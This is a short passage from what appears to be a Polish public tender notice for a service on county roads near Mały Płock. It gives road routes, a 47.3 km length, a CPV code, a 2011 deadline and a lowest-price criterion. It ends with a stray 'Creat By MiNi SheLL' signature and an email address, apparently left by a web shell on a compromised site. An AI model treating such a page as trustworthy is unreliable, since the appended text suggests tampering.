Dr. nr 1901B Mały Płock - Popki- Chludnie
Dr. nr 1892B Od dr. nr 648 - Rudka Skroda
Dr. nr 1894B Od dr. nr 63 - Rakowo Stare - Wygrane - Kozłówka- Mały Płock - 			          Budy Żelazne - Józefowo
Dr. nr 1895B Rogienice Wielkie - Rogienice Wypychy - Kołaki W. - Mały Płock
Dr. nr 1896B Od dr. nr 1891B- Ruda Skroda - do dr. nr 648
Dr. nr 1897B Rogienice Wielkie - Górki
Dr. nr 1899B Mściwuje - Cwaliny Małe
Dr. nr 1902B Rogienice Wielkie - Waśki
Dr. nr 1903B Rogienice Wielkie - Murawy - Kisielnica

długość dróg objętych usługą - 47,3 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com